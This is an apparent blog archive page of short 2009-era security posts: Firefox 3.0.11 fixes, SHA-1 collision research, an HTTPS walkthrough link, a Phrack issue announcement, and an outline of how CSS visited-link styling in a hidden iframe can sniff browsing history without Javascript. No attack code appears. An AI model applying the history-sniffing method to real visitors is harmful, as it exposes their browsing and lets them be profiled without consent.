Sniffing Browser History with NO Javascript!

This is a method of sniffing your browsing history without using Javascript. If you haven’t cleaned your browsing history recently, just click “Start Scan” and the system will get to work.

If this doesn’t shock you, it should: websites are not supposed to see this information. It has potential for anyone, in particular advertisers, to view your history and profile you.

Once you click start, it may take a few minutes before initial results appear. Overall, however, this method seems to be faster and smoother. IE will persistently click at you — sorry. Your back button will also break — sorry, again.

How? Without Javascript!?

It actually works pretty simply — it is simpler than the Javascript implementation. All it does is load a page (in a hidden Iframe) which contains lots of links. If a link is visited, a background (which isn’t really a background) is loaded as defined in the CSS. The “background” image will log the information, and then store it (and, in this case, it is displayed to you).

Proof of Concept:
http://www.making-the-web.com/misc/sites-you-visit/nojs/

Posted in Internet, Privacy | No Comments

Firefox 3.0.11 Released

Firefox 3.0.11 fixes several security issues found in Firefox 3.0.10:

• JavaScript chrome privilege escalation
• XUL scripts bypass content-policy checks
• Incorrect principal set for file: resources loaded via location bar
• Arbitrary code execution using event listeners attached to an element whose owner document is null
• Race condition while accessing the private data of a NPObject JS wrapper class object
• SSL tampering via non-200 responses to proxy CONNECT requests
• Arbitrary domain cookie access by local file: resources
• URL spoofing with invalid unicode characters
• Crashes with evidence of memory corruption (rv:1.9.0.11)

Run a Check for Updates off of the Help Menu, or download a fresh copy here:
http://www.mozilla.com/en-US/firefox/

Posted in Internet, Linux, Security, Windows | No Comments

The First Few Milliseconds of an HTTPS Connection

Here is a great post from Jeff Moser over at Moserware that gives you a detailed walk-through of what exactly happens when you make an https connection to a server (in this example: amazon.com). So much more happens than just the URL changing from http to https and a padlock icon appearing on your browser.  🙂

Read and be amazed:
http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html

Posted in Internet, Privacy, Security | No Comments

Attacks on SHA-1 made even easier

Australian researchers have described a new and faster way of provoking collisions of the SHA-1 hash algorithm. With their method, a collision can be found using only 2⁵² attempts. This makes practical attacks feasible and could have an impact on the medium-term use of the algorithm in digital signatures.

SHA-1 is used to verify data authenticity in many applications. To reduce the complexity of the collision process, the researchers combined a boomerang attack with the search for differential paths.

Towards the end of 2008, researchers demonstrated how to use 200 PlayStation 3 game consoles to forge SSL Certificate Authority certificates through finding MD5 hash collisions. SHA-1 could soon be in a similar position. However, successful exploits still require the attacker to have control of both hash messages. Pre-image attacks, in which attackers attempt to generate a new valid message using the hash of an already existing message, remain impossible.

The first method for speeding up the collision process was developed in early 2005, when Chinese researchers only needed 2⁶⁹ instead of 2⁸⁰ attempts to find two different records with the same hash value. A few months later, the complexity was reduced to 2⁶³ attempts.

The search for a successor to SHA-1 began in 2005. Algorithms of the SHA-2 family (SHA-224, SHA-256, SHA-384 and SHA-512) were among the suggestions, but they are essentially based on the same algorithm as SHA-1, only requiring longer hash values. As a result, they are probably vulnerable to the same types of attack.

Source:
http://www.h-online.com/security/Attacks-on-SHA-1-made-even-easier–/news/113510

Posted in Coding, Internet, Privacy, Security | 1 Comment

Phrack Issue #66 – What You Were Waiting For

We have the great pleasure to release today another excellent selection of the best Hacking articles this year. An issue full of new exploitation techniques and ground work on writing attack software.

This issue has some evil number.. with a lot of evil content. Phrack proves once more how we can, every year, push the state of the art further its known limits. Some of these exploits articles are really innovative and we are proud to be able to release those contributions in our columns. Some others bring their values on different architectures. So, check out how to attack the Objective C runtime, the latest Linux heap allocator, the FreeBSD kernel heap management system. A special paper is the one of Black about explaining and giving more insights and code on the groundbreaking work previously released as the Malloc Maleficarum technique(s). Black did rework his article quite a lot since the first version he did, and we were impressed by the evolution. This will certainly help the younger audience to persevere in the realm of heap overflow exploitation in the most recent restrictive heap management implementations on Linux. We also have articles on alphanumeric ARM shellcode (long standing work) and exploiting the PowerCell architecture. Thats indeed a lot of exploitation.

Start reading:
http://www.phrack.org/

Posted in Coding, Linux, Privacy, Security, Windows | No Comments